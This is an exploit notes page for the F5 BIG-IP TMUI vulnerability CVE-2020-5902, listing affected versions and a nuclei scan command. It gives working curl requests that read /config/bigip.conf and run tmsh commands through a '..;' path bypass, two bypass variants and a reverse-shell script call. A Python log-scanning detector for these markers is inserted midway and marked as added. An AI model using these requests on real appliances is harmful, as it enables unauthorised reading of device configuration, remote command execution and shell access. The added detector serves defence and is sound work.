F5 BIG-IP TMUI Remote Code Execution Vulnerability (CVE-2020-5902)

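    Vulnerability overview

    An authentication bypass leading to remote code execution.

    An attacker can exploit this vulnerability to execute arbitrary system commands, create or delete files, disable services, or execute arbitrary Java code.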

    Affected versions

    BIG-IP 15.1.0
    BIG-IP 14.1.0~14.1.2
    BIG-IP 13.1.0~13.1.3
    BIG-IP 12.1.0~12.1.5
    BIG-IP 11.6.1~11.6.5

    POC

    nuclei -tags bigip -t cves/ -l urls.txt
    
    Goby

    EXP

    File read

    curl -v -k "https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf"

    RCE

    curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

    Bypass

    ..;  ==>  /hsqldb; 
    
    ..;  ==>  /hsqldb%0a
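
A defensive complement to the requests above, added here as an example and not part of the original page: a Python scan of web access logs for the `..;` segment and the two `hsqldb` variants listed under Bypass. The Apache combined-style log layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed log layout: Apache combined-style line with a quoted request field.
REQUEST = re.compile(
    r'^(?P<client>\S+) .*?"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Markers taken from the page: "..;", "/hsqldb;" and "/hsqldb%0a" (decoded).
MARKERS = {
    "dotdot-semicolon": re.compile(r"\.\.;"),
    "hsqldb-semicolon": re.compile(r"/hsqldb;"),
    "hsqldb-newline": re.compile(r"/hsqldb\n"),
}
ENDPOINTS = ("fileread.jsp", "tmshcmd.jsp")  # JSPs named in the page's requests

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jul/2020:10:00:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jul/2020:10:00:02 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/'
    'workspace/fileRead.jsp?fileName=/config/bigip.conf HTTP/1.1" 200 812',
    '198.51.100.7 - - [05/Jul/2020:10:00:03 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/'
    'workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 200 300',
    '198.51.100.9 - - [05/Jul/2020:10:00:04 +0000] "GET /hsqldb; HTTP/1.1" 200 96',
    '198.51.100.9 - - [05/Jul/2020:10:00:05 +0000] "GET /hsqldb%0a HTTP/1.1" 404 0',
    '192.0.2.10 - - [05/Jul/2020:10:00:06 +0000] "GET /tmui/locallb/workspace/'
    'fileRead.jsp?fileName=/config/bigip.conf HTTP/1.1" 200 812',
]

def classify(uri):
    """Return marker names found in a URI after percent-decoding and lowercasing."""
    norm = unquote(uri).lower()
    hits = [name for name, rx in MARKERS.items() if rx.search(norm)]
    if hits:  # endpoint names are context only; alone they are normal admin use
        hits += ["endpoint:" + e for e in ENDPOINTS if e in norm]
    return hits

def scan(lines):
    """Return one finding per log line whose request URI carries a marker."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        hits = classify(m["uri"]) if m else []
        if hits:
            findings.append({"line": lineno, "client": m["client"],
                             "status": int(m["status"]), "hits": hits})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 deserves priority review, since the request was served rather than rejected.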

    reverse shell:

    ./CVE-2020-5902.sh <server> <localip> <localport>

    @Budi Khoirudin @jas502n